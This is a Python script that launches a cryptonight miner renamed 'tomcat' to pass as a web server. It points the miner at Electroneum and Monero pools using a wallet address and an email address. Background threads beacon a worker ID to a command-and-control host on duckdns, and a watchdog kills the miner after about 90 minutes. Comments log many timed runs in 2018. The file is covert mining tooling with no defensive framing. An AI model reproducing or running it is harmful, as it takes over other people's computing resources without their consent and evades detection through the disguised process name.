import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:42:07.075751
#2018-02-17 16:29:03.982997
#2018-02-17 18:16:06.063031
#2018-02-17 20:03:01.603248
#2018-02-17 21:51:05.395899
#2018-02-17 23:36:01.248250
#2018-02-18 01:24:07.284584
#2018-02-18 03:11:05.617013
#2018-02-18 05:01:05.157595
#2018-02-18 06:53:03.915265
#2018-02-18 08:40:04.860777
#2018-02-18 10:26:03.499543
#2018-02-18 12:12:06.762174
#2018-02-18 13:58:07.257538
#2018-02-18 15:48:05.860932
#2018-02-18 17:37:06.739358
#2018-02-18 19:25:06.768200
#2018-02-18 21:10:08.162497
#2018-02-18 22:57:06.015030
#2018-02-19 00:45:03.947190
#2018-02-19 02:32:03.778414
#2018-02-19 04:18:04.689037
#2018-02-19 06:03:01.651015
#2018-02-19 07:51:06.529122
#2018-02-19 09:41:06.586298
#2018-02-19 11:31:04.270106
#2018-02-19 13:18:01.443671
#2018-02-19 15:06:03.898852
#2018-02-19 16:55:11.710295
#2018-02-19 18:43:01.278705
#2018-02-19 20:31:01.655679
#2018-02-19 22:18:01.520747
#2018-02-20 00:03:02.006847
#2018-02-20 01:50:08.017197
#2018-02-20 03:38:03.441654
#2018-02-20 05:23:04.887383
#2018-02-20 07:07:05.687181
#2018-02-20 08:53:05.842649
#2018-02-20 10:37:08.876526
#2018-02-20 12:23:01.510392
#2018-02-20 14:09:04.291753
#2018-02-20 15:52:04.511396
#2018-02-20 17:37:08.096266
#2018-02-20 19:27:04.465261
#2018-02-20 21:16:06.679014
#2018-02-20 23:00:05.976092
#2018-02-21 00:45:06.982332
#2018-02-21 02:31:05.433574
#2018-02-21 04:18:04.847994
#2018-02-21 06:06:04.030488
#2018-02-21 07:52:05.076692
#2018-02-21 09:37:08.228657
#2018-02-21 11:26:07.729681
#2018-02-21 13:15:10.598839
#2018-02-21 15:01:07.535094
#2018-02-21 16:49:09.362478
#2018-02-21 18:38:04.428673
#2018-02-21 20:23:01.247774
#2018-02-21 22:12:08.267432
#2018-02-22 00:01:04.320116
#2018-02-22 01:50:05.835419
#2018-02-22 03:36:04.157960
#2018-02-22 05:23:06.875340
#2018-02-22 07:07:08.171074
#2018-02-22 08:53:02.209887
#2018-02-22 10:40:07.969029
#2018-02-22 12:28:04.778024
#2018-02-22 14:12:07.320395
#2018-02-22 15:59:12.551035
#2018-02-22 17:47:02.145124
#2018-02-22 19:33:08.966189
#2018-02-22 21:25:08.789990
#2018-02-22 23:14:06.930056
#2018-02-23 01:01:07.175889
#2018-02-23 02:48:08.360804
#2018-02-23 04:40:09.658470
#2018-02-23 06:26:07.283444
#2018-02-23 08:14:05.777878
#2018-02-23 10:31:04.241585
#2018-02-23 12:23:07.823418
#2018-02-23 14:12:08.755088
#2018-02-23 16:02:07.034458
#2018-02-23 17:49:06.346571
#2018-02-23 19:36:06.145380
#2018-02-23 21:18:08.212856
#2018-02-23 23:07:03.467498
#2018-02-24 00:55:07.768836
#2018-02-24 02:49:04.042883
#2018-02-24 04:39:07.309114
#2018-02-24 06:23:06.819220
#2018-02-24 08:11:04.013139
#2018-02-24 09:55:09.515272
#2018-02-24 11:49:07.845050
#2018-02-24 13:41:05.131779
#2018-02-24 15:28:06.217684
#2018-02-24 17:18:03.386041
#2018-02-24 19:09:07.178959
#2018-02-24 20:57:05.001406
#2018-02-24 23:25:04.114935
#2018-02-25 02:49:05.038635
#2018-02-25 05:32:06.264874
#2018-02-25 08:10:09.738322
#2018-02-25 11:41:01.231771
#2018-02-25 14:13:01.677541
#2018-02-25 15:48:01.299586